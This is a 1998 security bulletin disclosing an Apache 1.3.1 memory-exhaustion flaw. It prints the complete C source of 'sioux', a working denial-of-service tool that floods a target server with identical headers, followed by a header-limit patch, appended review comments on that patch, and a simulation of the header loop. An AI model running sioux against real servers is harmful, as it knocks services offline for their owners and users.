sekure/uground industries - Security Bulletin
........................................................
www.sekure.org                   -> sekure.03-98.apache <-

1. Description
'`'`'`'`'`'`'`

A vulnerability has been found in all Apache HTTP servers up to and including
version 1.3.1. The problem lies in the way Apache handles the headers sent by
the client.

2. Impact
'`'`'`'`'

Increased memory consumption by the Apache process. Sending 10,000 headers
drives memory usage up to approximately 380Mb.

3. Testing the vulnerability
'`'`'`'`'`'`'`'`'`'`'`'`'`'`

Below is an exploit called sioux that triggers this vulnerability. It works by
opening a TCP connection to the Apache server and sending many identical
headers.

/*-
 * Copyright (c) 1998 Dag-Erling Coïdan Smørgrav
 * All rights reserved.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions
 * are met:
 * 1. Redistributions of source code must retain the above copyright
 *    notice, this list of conditions and the following disclaimer
 *    in this position and unchanged.
 * 2. Redistributions in binary form must reproduce the above copyright
 *    notice, this list of conditions and the following disclaimer in the
 *    documentation and/or other materials provided with the distribution.
 * 3. The name of the author may not be used to endorse or promote products
 *    derived from this software without specific prior written permission
 *
 * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR
 * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
 * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
 * IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT,
 * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
 * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
 * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
 * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
 * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
 * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
 *
 */

/*
 * Kudos to Mark Huizer who originally suggested this on freebsd-current
 */

/* header names were lost in this copy of the bulletin; these are the
 * standard headers the code below needs */
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <strings.h>
#include <unistd.h>

void
usage(void)
{
    fprintf(stderr, "usage: sioux [-a address] [-p port] [-n num]\n");
    exit(1);
}

int
main(int argc, char *argv[])
{
    struct sockaddr_in sin;
    struct hostent *he;
    FILE *f;
    int o, sd;

    /* default parameters */
    char *addr = "localhost";
    int port = 80;
    int num = 1000;

    /* get options */
    while ((o = getopt(argc, argv, "a:p:n:")) != EOF)
        switch (o) {
        case 'a':
            addr = optarg;
            break;
        case 'p':
            port = atoi(optarg);
            break;
        case 'n':
            num = atoi(optarg);
            break;
        default:
            usage();
        }
    if (argc != optind)
        usage();

    /* connect */
    if ((he = gethostbyname(addr)) == NULL) {
        perror("gethostbyname");
        exit(1);
    }
    bzero(&sin, sizeof(sin));
    bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
    sin.sin_family = he->h_addrtype;
    sin.sin_port = htons(port);
    if ((sd = socket(sin.sin_family, SOCK_STREAM, IPPROTO_TCP)) == -1) {
        perror("socket");
        exit(1);
    }
    if (connect(sd, (struct sockaddr *)&sin, sizeof(sin)) == -1) {
        perror("connect");
        exit(1);
    }
    if ((f = fdopen(sd, "r+")) == NULL) {
        perror("fdopen");
        exit(1);
    }

    /* attack! */
    fprintf(stderr, "Going down like a plague of locusts on %s\n", addr);
    fprintf(f, "GET / HTTP/1.1\r\n");
    /* one identical header line per iteration; the server copies each
     * of them into the request pool (see section 4) */
    while (num-- && !ferror(f))
        fprintf(f, "User-Agent: sioux\r\n");
    if (ferror(f)) {
        perror("fprintf");
        exit(1);
    }
    fclose(f);
    exit(0);
}

4. Preventive measures
'`'`'`'`'`'`'`'`'`'`'`

Provisional patch for Apache 1.3.1 by Ben Laurie:

<-> cut here <->
diff -u -r1.229 http_protocol.c
--- http_protocol.c	1998/08/06 17:30:30	1.229
+++ http_protocol.c	1998/08/07 23:02:56
@@ -714,6 +714,7 @@
     int len;
     char *value;
     char field[MAX_STRING_LEN];
+    int nheaders=0;

     /*
      * Read header lines until we get the empty separator line, a read error,
@@ -723,6 +724,11 @@
         char *copy = ap_palloc(r->pool, len + 1);
         memcpy(copy, field, len + 1);

+        if(++nheaders == 100) {
+            r->status = HTTP_BAD_REQUEST;
+            return;
+        }
+
         if (!(value = strchr(copy, ':'))) {     /* Find the colon separator */
             r->status = HTTP_BAD_REQUEST;       /* or abort the bad request */
             return;
<-> cut here <->

Looking at the code:

    memcpy(copy, field, len + 1);

This is where the problem lies: for as long as the client keeps sending
headers, Apache keeps allocating a copy of each one. Because of Apache's pool
memory system, the memory is not released inside this loop, so it grows with
every header received. The patch works by limiting the number of headers
accepted on one connection to 100.

5. Contacts
'`'`'`'`'`'

sekure/uground industries - Security Bulletin
a publication of sekure/uground industries (tm)
http://www.sekure.org - contacts: security@sekure.org

Look for sekure/uground industries advisories at
http://www.sekure.org/advisories.html

Subscribe to the Best Of Security Brasil list - http://www.sekure.org/bos
Send a message to bos-br-request@sekure.org
with "subscribe bos-br" in the body of the message.

----
text: dumped - dumped@sekure.org
sekure/uground industries (tm) - 1998
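Review bot: in the first hunk (@@ -714,6 +714,7 @@), `int nheaders=0;` is a local declared next to `int len;` and `char field[MAX_STRING_LEN];`, so the counter is reset every time this header-reading function is entered: the limit is per request, not per connection as the accompanying text says, and on a keep-alive connection each new request starts again from zero. Match the neighbouring declarations' spacing as well: `int nheaders = 0;`.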
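Review bot: in the second hunk (@@ -723,6 +724,11 @@), the `if(++nheaders == 100)` test sits after `char *copy = ap_palloc(r->pool, len + 1);` and `memcpy(copy, field, len + 1);`, so the 100th header is still copied into the pool before the request is refused; placing the check before the `ap_palloc` avoids that last allocation. The bare `100` should also be a named constant (or a configurable directive) so the limit is documented and can be raised for clients that legitimately send many headers, and `>=` is safer than `==` should the early `return` ever be removed.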
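As an added illustration (not part of the bulletin and not Apache's own code), the loop below mirrors the patched header-reading loop described in section 4: every header line is charged to a request-pool byte counter that is never decremented inside the loop, and the request is refused on the 100th header at the same point where the patch tests `++nheaders == 100`. `scan_sioux` builds a constructed request shaped like the traffic sioux sends; `hdr_scan`, `scan_headers`, `scan_sioux` and the assumed `MAX_STRING_LEN` value are names and constants chosen here.

```c
#include <stdlib.h>
#include <string.h>
#define MAX_STRING_LEN   8192   /* assumed per-line buffer size, as in Apache 1.3 */
#define MAX_HEADERS      100    /* the cap the patch above introduces */
#define HTTP_OK          200
#define HTTP_BAD_REQUEST 400

/* status: HTTP_OK or HTTP_BAD_REQUEST; nheaders: header lines seen, including
 * a rejected one; pool_bytes: memory a request pool would still be holding. */
struct hdr_scan { int status; int nheaders; size_t pool_bytes; };

/* Walk the header block after the request line. Each line costs len+1 bytes of
 * pool memory (ap_palloc + memcpy in the patched loop) that is only freed when
 * the request ends, so the total grows per header. max_headers > 0 rejects on
 * the max_headers-th line, the patch's "++nheaders == 100"; <= 0 means no cap. */
struct hdr_scan scan_headers(const char *req, int max_headers)
{
    struct hdr_scan s = { HTTP_OK, 0, 0 };
    const char *p = strstr(req, "\r\n");           /* skip the request line */
    if (p == NULL) { s.status = HTTP_BAD_REQUEST; return s; }
    for (p += 2; *p != '\0'; ) {
        const char *eol = strstr(p, "\r\n");
        size_t len = eol ? (size_t)(eol - p) : strlen(p);
        if (len == 0) break;                        /* empty separator line */
        if (len >= MAX_STRING_LEN) { s.status = HTTP_BAD_REQUEST; return s; }
        s.pool_bytes += len + 1;                    /* copied before the check */
        if (++s.nheaders == max_headers) { s.status = HTTP_BAD_REQUEST; return s; }
        if (memchr(p, ':', len) == NULL) { s.status = HTTP_BAD_REQUEST; return s; }
        if (eol == NULL) break;                     /* last line had no CRLF */
        p = eol + 2;
    }
    return s;
}

/* Constructed input shaped like sioux's traffic: one request line, then n
 * identical User-Agent headers and no terminating blank line. */
struct hdr_scan scan_sioux(int n, int max_headers)
{
    static const char req[] = "GET / HTTP/1.1\r\n", line[] = "User-Agent: sioux\r\n";
    size_t rl = sizeof req - 1, ll = sizeof line - 1;
    char *buf = malloc(rl + (size_t)n * ll + 1), *q = buf;
    struct hdr_scan s;
    if (buf == NULL) abort();
    memcpy(q, req, rl); q += rl;
    for (int i = 0; i < n; i++, q += ll) memcpy(q, line, ll);
    *q = '\0';
    s = scan_headers(buf, max_headers); free(buf);
    return s;
}
```

With the cap disabled (`max_headers` of 0) the 1000-header request is accepted and the pool counter reaches 18000 bytes; with `MAX_HEADERS` it is refused on the 100th line with 1800 bytes charged.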